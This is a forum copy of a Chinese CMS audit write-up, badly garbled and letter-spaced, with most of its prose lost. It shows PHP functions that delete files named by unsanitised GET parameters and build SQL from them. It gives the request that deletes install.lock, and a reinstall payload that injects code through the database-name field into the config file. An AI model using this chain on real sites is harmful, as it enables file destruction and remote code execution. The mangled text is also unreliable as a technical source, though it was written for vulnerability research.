[2078] 2021-08-04_CMS审计任意文件删除-RCE

文档创建者:s7ckTeam
浏览次数:0
最后更新:2025-01-16
2021-08-04_CMS审计任意文件删除-RCE C M S :   - > R C E   d o n 9 s e c   d o n 9 s e c   2 0 2 1 - 0 8 - 0 4 #   , 1 # g e t s h e l l   , 1 #   , 1 #   , 8   o r   p a y l o a d g e t s h e l l   - >   R C E i n s t a l l l o c k l o c k 退 ( ) -   u n l i n k ( c m s 5 u n l i n k ( 1 .   / a p p / c o n t r o l l e r / p i c t u r e . c l a s s . p h p
2 .   / p l u g i n s / f l a s h / M a i n . c l a s s . p h p 3 .   a p p c o n t r o l l e r k i n d e d i t o r . c l a s s . p h p 4 .   / a p p / a d m i n / p i c t u r e . c l a s s . p h p 5 .   / a p p / a d m i n / d o w n l o a d . c l a s s . p h p p u b l i c   f u n c t i o n   d e l e t e P i c ( )   {     $ p a t h   =   R O O T _ P A T H . $ _ G E T [ ' p i c ' ] ;     u n l i n k ( $ p a t h ) ;     $ f l a s h   =   M ( " f l a s h " ) ;     $ r o w   =   $ f l a s h - > q u e r y ( " d e l e t e   f r o m   " . T A B L E P R E . " a t t a c h m e n t   w h e r e   f i l e p a t h = ' " . $ _ G E T [ ' p i c ' ] . " ' " ) ;     e c h o   ' ' ; }     p u b l i c   f u n c t i o n   f l a s h D e l P i c ( )   {         $ f l a s h   =   M ( " f l a s h " ) ;         e c h o ( $ f l a s h ) ;         $ f l a s h - > q u e r y ( " d e l e t e   f r o m   t c _ f l a s h   w h e r e   p h o t o = ' " . $ _ G E T [ ' d e l P a t h ' ] . " ' " ) ;             $ p a t h   = $ _ G E T [ ' d e l P a t h ' ] ;             $ d e l P a t h   =   $ p a t h ;             i f   ( f i l e _ e x i s t s ( $ d e l P a t h ) )   {                 u n l i n k ( $ d e l P a t h ) ;                 e x i t ( 1 ) ;             }             e x i t ( 0 ) ;         }     p u b l i c   f u n c t i o n   d e l e t e ( )   {         $ p a t h   =   R O O T _ P A T H . $ _ G E T [ ' p i c ' ] ;         u n l i n k ( $ p a t h ) ;         $ f l a s h   =   M ( " f l a s h " ) ;         $ r o w   =   $ f l a s h - > q u e r y ( " d e l e t e   f r o m   t c _ f l a s h   w h e r e   p h o t o = ' " . $ _ G E T [ ' p i c ' ] . " ' " ) ;         e c h o   ' ' ;     } < ? p h p d e f i n e d ( ' I N _ A D M I N ' )   o r   e x i t ( ' A c c e s s   D e n i e d ' ) ; d e f i n e d ( ' x x x x _ C M S ' )   o r   e x i t ( ' A c c e s s   D e n i e d ' ) ;     p u b l i c   f u n c t i o n   d e l e t e P i c ( )   {     $ p a t h   =   R O O T _ P A T H . $ _ G E T [ ' p i c ' ] ;     u n l i n k ( $ p a t h ) ;     $ f l a s h   =   M ( " f l a s h " ) ;     $ r o w   =   $ f l a s h - > q u e r y ( " d e l e t e   f r o m   " . T A B L E P R E . " a t t a c h m e n t   w h e r e   f i l e p a t h = ' " . $ _ G E T [ ' p i c ' ] . " ' " ) ;     e c h o   ' ' ; }   < ? p h p
a d m i n " " m v c p a y l o a d p a y l o a d g e t s h e l l   < ? p h p d e f i n e d ( ' I N _ A D M I N ' )   o r   e x i t ( ' A c c e s s   D e n i e d ' ) ; d e f i n e d ( ' x x x x _ C M S ' )   o r   e x i t ( ' A c c e s s   D e n i e d ' ) ;   . . .   p u b l i c   f u n c t i o n   d e l e t e P i c ( )   {     $ p a t h   =   R O O T _ P A T H . $ _ G E T [ ' p i c ' ] ;     u n l i n k ( $ p a t h ) ;     $ f l a s h   =   M ( " a t t a c h m e n t " ) ;     $ r o w   =   $ f l a s h - > q u e r y ( " d e l e t e   f r o m   " . T A B L E P R E . " a t t a c h m e n t   w h e r e   f i l e p a t h = ' " . $ _ G E T [ ' p i c ' ] . " ' " ) ;     e c h o   ' ' ; } #   _ , g e t p o s t i n d e x . p h p ? a c = c o n t r o l l e r _ m e t h o d & p a r a m 1 = & p a r a m 2 = #   i n d e x . p h p ? a c = p i c t u r e _ d e l e t e P i c & p i c = / x . t x t
s h e l l 姿 ,   3 i n s t a l l . l o c k ,   g e t s h e l l m y . p h p g e t s h e l l g e t s h e l l / a p p / d a t a / i n s t a l l . l o c k / a p p / d a t a / m y s q l . p h p g e t s h e l l D B N A M E p a y l o a d p a y l o a d ( 访 m y s q l . p h p ) d e f i n e ( ' D B N A M E ' ,   ' t e s t ' ) ; p h p i n f o ( ) ; / / ; t e s t ' ) ; p h p i n f o ( ) ; / /
b u g   >   r c e
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则